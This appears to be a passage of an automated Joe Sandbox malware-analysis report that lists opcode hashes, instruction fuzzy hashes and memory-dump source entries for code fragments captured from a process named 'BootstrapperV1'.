                                                      • String ID: CV_H
                                                      • API String ID: 0-2247160564
                                                      • Opcode ID: 97ce32f6c0501b1b621fd2bc0f22af36a710e0c2e6c35e57a62cd9e48514e912
                                                      • Instruction ID: 1440b06e2708abc52e05f0239f03bc8cb4de63a20c7ca75e48238fbc44158a6b
                                                      • Opcode Fuzzy Hash: 97ce32f6c0501b1b621fd2bc0f22af36a710e0c2e6c35e57a62cd9e48514e912
                                                      • Instruction Fuzzy Hash: F4712B62F1E9890FE7A49B6C18756B477D2EFAD290B0A40FBD48CC72E7DC186C068341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: e82ba937defaae7f7a6219d29dd4858e6941d8436d277447313fd7f714239516
                                                      • Instruction ID: 2924d09bcd1199f639ec6cb23f6bf55a8b0cae2a6bf8445e5231b49ef0e6be39
                                                      • Opcode Fuzzy Hash: e82ba937defaae7f7a6219d29dd4858e6941d8436d277447313fd7f714239516
                                                      • Instruction Fuzzy Hash: 4F81A130719B098FD768DF48D4919B9B3E1FF98340B154A7DD48AC72A6DA31F9438B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: zK_H
                                                      • API String ID: 0-472741372
                                                      • Opcode ID: f461ece26266ace3fefe9c4bc803c02d3cadedcf5b2ad5214c725986be41cc12
                                                      • Instruction ID: e176e700af632e3e99eff8a7548b502de851d03f0512abaa48a272ae28c0ee49
                                                      • Opcode Fuzzy Hash: f461ece26266ace3fefe9c4bc803c02d3cadedcf5b2ad5214c725986be41cc12
                                                      • Instruction Fuzzy Hash: A1813D72A0EA8E1FEB95DF6894B96F53BD1EF59390B0500FAD489C71A3DD285C42C301
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: V_H
                                                      • API String ID: 0-105569101
                                                      • Opcode ID: ad27669bdf5232335a9ca683fae626b029c29b179d6a07d5263320308cb654a6
                                                      • Instruction ID: 67de65fa59e03d96b65b6a6ebeb640a2f683d3ced8385243b32f65410a148f81
                                                      • Opcode Fuzzy Hash: ad27669bdf5232335a9ca683fae626b029c29b179d6a07d5263320308cb654a6
                                                      • Instruction Fuzzy Hash: B5814171E1591D4BEBA8DB5C98997E873B1FF9C350F0102FA905DD3296DE346E818B40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PL_^
                                                      • API String ID: 0-574200178
                                                      • Opcode ID: 6c139f3da2b788f47119329b488191adc5d3952e511dc76dd18c0b035b6dda19
                                                      • Instruction ID: 785b4b209893b66dc491a669ad103fe0949f5ebae9574f2c03970768cbc9f3f6
                                                      • Opcode Fuzzy Hash: 6c139f3da2b788f47119329b488191adc5d3952e511dc76dd18c0b035b6dda19
                                                      • Instruction Fuzzy Hash: BF61F31BF0C6960AD305BBBCB8698FD3B60DFC123A71982B7D19D890DBDD18648643D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tK_H
                                                      • API String ID: 0-4243718863
                                                      • Opcode ID: eafc468304165a93f8cdd86b8288c5ead5b527f433234b1e17c4cb5e6613eda8
                                                      • Instruction ID: ad1ea7a722d10ea6aeea105595882645396a725ff78577e2ba88a66946af0462
                                                      • Opcode Fuzzy Hash: eafc468304165a93f8cdd86b8288c5ead5b527f433234b1e17c4cb5e6613eda8
                                                      • Instruction Fuzzy Hash: E5513972B0AD4D4FDBA5DB6858B56E937D2EF9C760F0500BAE04DC72E6DE286C018381
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: IY_H
                                                      • API String ID: 0-3776009645
                                                      • Opcode ID: 8f7386aa625670a1eb5643143856dcfa2553079811bf0a3fef44be8a90679a27
                                                      • Instruction ID: 1ddc39967b043157804eed458b792967b690b8510f2636c5d49168d37fb7fda8
                                                      • Opcode Fuzzy Hash: 8f7386aa625670a1eb5643143856dcfa2553079811bf0a3fef44be8a90679a27
                                                      • Instruction Fuzzy Hash: F3317462B0ED0E4FFAA89A4C54A82F617D2EFEC291715417FD88DC71A5DD11AC0A8350
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [G
                                                      • API String ID: 0-1439089712
                                                      • Opcode ID: e07c58086a0478a2f2f681c4ce5216d7c0d39a36218c7415339368a3e28ffe07
                                                      • Instruction ID: 70f5b5f5cf09b4b262fb38de972ae6380bec3809a2299eaf4b46b384b28d1eb8
                                                      • Opcode Fuzzy Hash: e07c58086a0478a2f2f681c4ce5216d7c0d39a36218c7415339368a3e28ffe07
                                                      • Instruction Fuzzy Hash: A1110861B189190BE7A4AB6CE8156FA73C0DF993A1F05057BF48DC22A1DE58DA828381
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [A
                                                      • API String ID: 0-3164954885
                                                      • Opcode ID: 1efc74aa53033bb69b9311cc926f9c89ec89750c6f7d6f38487fb426ea721033
                                                      • Instruction ID: 24dc0c953b6e9de8f4b20c79a28e571991255c4546f6150635813bb7cd81859c
                                                      • Opcode Fuzzy Hash: 1efc74aa53033bb69b9311cc926f9c89ec89750c6f7d6f38487fb426ea721033
                                                      • Instruction Fuzzy Hash: 3F11E62160E7891FE762A7789CA65F13FD4EF4A36470A00FBE4CDC71A3D8095C828361
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [`
                                                      • API String ID: 0-4039930203
                                                      • Opcode ID: 72267b376dbe672d902c995ca18818e307ef694862fc627a93d74350d0e955bc
                                                      • Instruction ID: 06d3cd4da633f58a35a9f85b25e60eae0c8d6d48c4908b15dc3475cb58795df4
                                                      • Opcode Fuzzy Hash: 72267b376dbe672d902c995ca18818e307ef694862fc627a93d74350d0e955bc
                                                      • Instruction Fuzzy Hash: E3E09251B6F25A4BE1232AB928350AC7FD08F9732175806BBD045C61B6E84C594AC296
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a3d17bbade8d88840bb0b9ba8694acb1bb580726ff986bdc7d243e7c592f475
                                                      • Instruction ID: 5c0a302053da557ab616934aafcdb7081b2950ce381841d2486bccb9f85f1ac5
                                                      • Opcode Fuzzy Hash: 1a3d17bbade8d88840bb0b9ba8694acb1bb580726ff986bdc7d243e7c592f475
                                                      • Instruction Fuzzy Hash: 95122871B0EA4D4FE768DB6C98656B977E1EF59310F0501BEE08EC32A2DE24BD418781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 078cf77d95b36b806f1866ca64edca085283ca1164a7f1c9e819bdfe25042b31
                                                      • Instruction ID: 8690d67da527b08cae41cab02a109a8dfbc8827a588a1aefb82703d23d8e985a
                                                      • Opcode Fuzzy Hash: 078cf77d95b36b806f1866ca64edca085283ca1164a7f1c9e819bdfe25042b31
                                                      • Instruction Fuzzy Hash: 1B128C71A0F7869FD35BABB884651A4BFE0AF06334B5605FED049CB2B3C92D48828755
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82593c95200bb0faee75c5603d4354bc123007b3cc72ba5c5860be0298db8c0a
                                                      • Instruction ID: 8e74680630a5931fd3cee20dafe254d824ca4e9c8e3aedac3e03d94f1c99d244
                                                      • Opcode Fuzzy Hash: 82593c95200bb0faee75c5603d4354bc123007b3cc72ba5c5860be0298db8c0a
                                                      • Instruction Fuzzy Hash: 03128A71A0F7869FD35B9BB484651A4BFE0AF06334B5A05FED049CB2A3C92D4882C755
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cb05e67ca2a2025a4e209fc2ad5ade0bdb0db53d46422b625ee4aba1c4b5ad7
                                                      • Instruction ID: 222a53fc63d97e0546189d186d3471ac309248bd550376dae6ffeddcde5c012b
                                                      • Opcode Fuzzy Hash: 0cb05e67ca2a2025a4e209fc2ad5ade0bdb0db53d46422b625ee4aba1c4b5ad7
                                                      • Instruction Fuzzy Hash: A5023B32A0FACD5FD755DBBC88695E97BB0FF59254B0502FAC098CB1A3DD28A9068341
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8fec693313831dffd2ca66a416a8fe39b66a199740cf74ebf6e107d77319163
                                                      • Instruction ID: 7d33d4e72770b8eec9d4b26ddb366fa59befe10ce06c267511771b9d043e3435
                                                      • Opcode Fuzzy Hash: e8fec693313831dffd2ca66a416a8fe39b66a199740cf74ebf6e107d77319163
                                                      • Instruction Fuzzy Hash: 9AE13721B2EA4D4FEBA49B7848752B937D1EF9DB10F0601BAD44DC72E3DD28AD428341
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13625d59a47e7f8e1022de0a98cf356ccd5d161c60fcf478354e717a40d6135b
                                                      • Instruction ID: fd6fc2b8104a495427c564ab709183c9a44ee9861f1733756d5c56e9fcaa2d62
                                                      • Opcode Fuzzy Hash: 13625d59a47e7f8e1022de0a98cf356ccd5d161c60fcf478354e717a40d6135b
                                                      • Instruction Fuzzy Hash: 9DE1C570A1DB8D4FE764EF2C84696A6B7D2FFA8340F11497DD08DC32A6DE34A8418742
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c05152240a6e2f17a87b11c1f7adc1a77c69f2655668ee287c0467ab26b66809
                                                      • Instruction ID: a576bbe0b0e75dc0315e1e3d1dfa2e2cd724d9ba87daba417252db8d85d9760f
                                                      • Opcode Fuzzy Hash: c05152240a6e2f17a87b11c1f7adc1a77c69f2655668ee287c0467ab26b66809
                                                      • Instruction Fuzzy Hash: BCE1D570A1DB8D4FE764EF2C84696A6B7D2FF98340F01497DE48DC72A6DE34A8418742
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76d71a8ea437901822fb12bfd569522646b69fe361de4d5490e5b971d0e86f52
                                                      • Instruction ID: 42b27637da80a8585affa89031ac731ce07a176cb46f5bcdc44b41dd28420744
                                                      • Opcode Fuzzy Hash: 76d71a8ea437901822fb12bfd569522646b69fe361de4d5490e5b971d0e86f52
                                                      • Instruction Fuzzy Hash: 4FD1C231B19A4D4FDB98DF68C865AF977E1FF99310F0501BAD40AC72A6DA35A842C780
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be2053d1c13dd2f5a63d31cc25eede2bd0dc25473fe5fd87d56a4c4840036606
                                                      • Instruction ID: 20f82109617f6bcc5a81744771975a339730f8efe7afd0acccb8c805bf9d56b9
                                                      • Opcode Fuzzy Hash: be2053d1c13dd2f5a63d31cc25eede2bd0dc25473fe5fd87d56a4c4840036606
                                                      • Instruction Fuzzy Hash: D2C10631B1EA4D4FDB95EB7C88696B937D2EF9D71071500BAE08DC72A7DD28AC428341
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3a3e4433b809f0e9bbbee7ea46e279c8683713c76960ea62e4a1819ad8161f2
                                                      • Instruction ID: b70b053af1f6f1c961e08e64f27983843e84019472820760b94320d41f70d753
                                                      • Opcode Fuzzy Hash: c3a3e4433b809f0e9bbbee7ea46e279c8683713c76960ea62e4a1819ad8161f2
                                                      • Instruction Fuzzy Hash: 5BD10521B0EA4A4BF77997A484A12F977D2EF49350F22857AC4CFC31E6DD2C7A424381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e1e73660ca90212ecbe8c78535c032aa328e7d1feae964ef056ea4e850f3e7f
                                                      • Instruction ID: 85947984915e39da883409fb888221bc19aa98c17d5e4b5f2c17774d1e731fb3
                                                      • Opcode Fuzzy Hash: 2e1e73660ca90212ecbe8c78535c032aa328e7d1feae964ef056ea4e850f3e7f
                                                      • Instruction Fuzzy Hash: 27C139A2B0FA8D0FE775DF6C98655B43BE1EF99310B0A01BBE489C71A2DD14ED458381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d4b045d3ce9caeda0f191d74fdb369db4355fa0b8edd1afb5aaa480ed63a2bf
                                                      • Instruction ID: 5a65b596c0e85871ef0b78582782c1517a90b2172bf1d8b537944373e6eb7ca1
                                                      • Opcode Fuzzy Hash: 4d4b045d3ce9caeda0f191d74fdb369db4355fa0b8edd1afb5aaa480ed63a2bf
                                                      • Instruction Fuzzy Hash: 21C13933B0E6990FE354BB7CA8656E977E0EF85329F1946BBD0CDCA0A3CD1464468391
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d71efb880fd9de2759b88f866134482fb7f61bbf29f69dfd0db9358bb43f96f
                                                      • Instruction ID: 718766db5001cad264188bff3dce51d2655292edb7691ede750b30447e429641
                                                      • Opcode Fuzzy Hash: 0d71efb880fd9de2759b88f866134482fb7f61bbf29f69dfd0db9358bb43f96f
                                                      • Instruction Fuzzy Hash: D2D10570B1DB4D4FE764EB2C84696A6B7D2FF98340F01497DE08DC32A6DE34A8418B42
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cbdb5a1829c9b073ad0e47b6712804fb78467b77fed2445fcb1e957acb7fb2b
                                                      • Instruction ID: 6db411e74fb7e393ce540d0c825c2581b095ce0a751e929755e7228c46c974dd
                                                      • Opcode Fuzzy Hash: 1cbdb5a1829c9b073ad0e47b6712804fb78467b77fed2445fcb1e957acb7fb2b
                                                      • Instruction Fuzzy Hash: 7CA12A65B0EE4E0FE7A8EB6C547967537D2EF9C320B4501BED44DC72A6DD18AC428381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58a2358c5c7c4c0801c6fccfe1ad9cd8458ededf2cca89f3c25067c7b1b91172
                                                      • Instruction ID: 19ea88da8e8d713c00b413f64c4b8fd2712c6c917ff288163b483c7866724a66
                                                      • Opcode Fuzzy Hash: 58a2358c5c7c4c0801c6fccfe1ad9cd8458ededf2cca89f3c25067c7b1b91172
                                                      • Instruction Fuzzy Hash: 8CC1F730B1DA4D4FDBA4EB6888659B97BE1FF99710B0101BEE44DC72A3DE24E9418781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49790fa004c248c2cd54fb2192350c91b0ca23551e41fb00ca719f0cc75eaf2d
                                                      • Instruction ID: 895dcad13debdcd35ca811a540086a440a46c438065e88531294c9e297243d38
                                                      • Opcode Fuzzy Hash: 49790fa004c248c2cd54fb2192350c91b0ca23551e41fb00ca719f0cc75eaf2d
                                                      • Instruction Fuzzy Hash: F6A19E2170AD0E4FEAF4EF9C94A4AA473D2EFAC3A171905BBD44DC72A6DD54ED418380
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b7ab9ee23476102843584c2c9866631a6bcc8d576191c99b930b800a4e8a1dc
                                                      • Instruction ID: 543c1ccedf5cf22bf31910721db5058f72e86b713ab6559f8c428b4b307545cc
                                                      • Opcode Fuzzy Hash: 9b7ab9ee23476102843584c2c9866631a6bcc8d576191c99b930b800a4e8a1dc
                                                      • Instruction Fuzzy Hash: 1BC14932A0F68D5FEB65DB6C98A56E93BE1FF59364F0501BAE04CC71A7D924E9018340
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e0ba7972dfc7a13528bc9b1fc5efc9acbbf73d4e392bbf6f159630f0eae86dd
                                                      • Instruction ID: 9bc7ff1670d7adc70aa74c4be3c3ebcbe6da5dab296db3fb542c57bc2311fcd6
                                                      • Opcode Fuzzy Hash: 9e0ba7972dfc7a13528bc9b1fc5efc9acbbf73d4e392bbf6f159630f0eae86dd
                                                      • Instruction Fuzzy Hash: 5991F462B1FC5E4FE7B59B6C18B92F423C1EFAC69071641B7D8CDC31A6ED18AD064290
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc16ad828c5adeddcfe3294769af580caf2422bbcd727110538a8035a198ddfc
                                                      • Instruction ID: 612aea24ebfe466488f8a4d9621c39d02d6b71d2fda27910ee4dba0a8689878b
                                                      • Opcode Fuzzy Hash: dc16ad828c5adeddcfe3294769af580caf2422bbcd727110538a8035a198ddfc
                                                      • Instruction Fuzzy Hash: 8BA1B330B19E4D4FEBA4EF6884A4BA477D2EF68340B0541B9D44ECB2A7DD28ED45C781
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b453db631f8d0db337adc60473daef234de751e0cc6f4be88987ca71246043e3
                                                      • Instruction ID: cfc88b5dd16cdf86a12cd34a4a816a1794c25ac4fd129e2cf8fb497dab5ca14b
                                                      • Opcode Fuzzy Hash: b453db631f8d0db337adc60473daef234de751e0cc6f4be88987ca71246043e3
                                                      • Instruction Fuzzy Hash: EFA1F522F1DA8D4FE754EBE898756EC7BF1EF893A4F1501BAD088D71A3DD1828418741
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8503dc8264abbb29ebf092095cdb0f814643bd5ee422ecc251ec821ac2cf0cb1
                                                      • Instruction ID: 1a516470e0bf7c10b1589560630b652b419b38f28e14988e4f2fea48a109603e
                                                      • Opcode Fuzzy Hash: 8503dc8264abbb29ebf092095cdb0f814643bd5ee422ecc251ec821ac2cf0cb1
                                                      • Instruction Fuzzy Hash: BBB1D231B0DB8E8FDB95EF688874AB97BE1EF55300F1501BAD409C71E2DA29A941C780
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 99b5fbfafd2e8e8208a2e2e01e151c8258696c3cd9366973fb1d849a326e961a
                                                      • Instruction ID: bcaf49320dc00bf4a022bd237ffe10b13994524721d00c3621a1cc720a5cdde3
                                                      • Opcode Fuzzy Hash: 99b5fbfafd2e8e8208a2e2e01e151c8258696c3cd9366973fb1d849a326e961a
                                                      • Instruction Fuzzy Hash: B4B13471E1A55D5FEBA8DFA8D8657A8B7B5FF59301F0001BAE00DD7292DE386981CB00
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9b00ee29826a9d0ee4a93d86df2f41a194b06299e31e35caa0f4b52c04b5bfd
                                                      • Instruction ID: 2ddb85eb1dbe885438b6bab97df40d5fbd4b0b4cc1f7cafbbbb3755b0e518efc
                                                      • Opcode Fuzzy Hash: d9b00ee29826a9d0ee4a93d86df2f41a194b06299e31e35caa0f4b52c04b5bfd
                                                      • Instruction Fuzzy Hash: 19A1E430B0EB8E8FDB95EF688875AB97BE1EF55300F1501BAD449C71F2CA29A841C741
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7de828800ebdeb4139896e179e6b2fa5232eeb3b47e4c09c2ae1288e1463969f
                                                      • Instruction ID: 2261a7eff0d5b26d2917a3452de8f1223029bc7918439de56172c605db5913bf
                                                      • Opcode Fuzzy Hash: 7de828800ebdeb4139896e179e6b2fa5232eeb3b47e4c09c2ae1288e1463969f
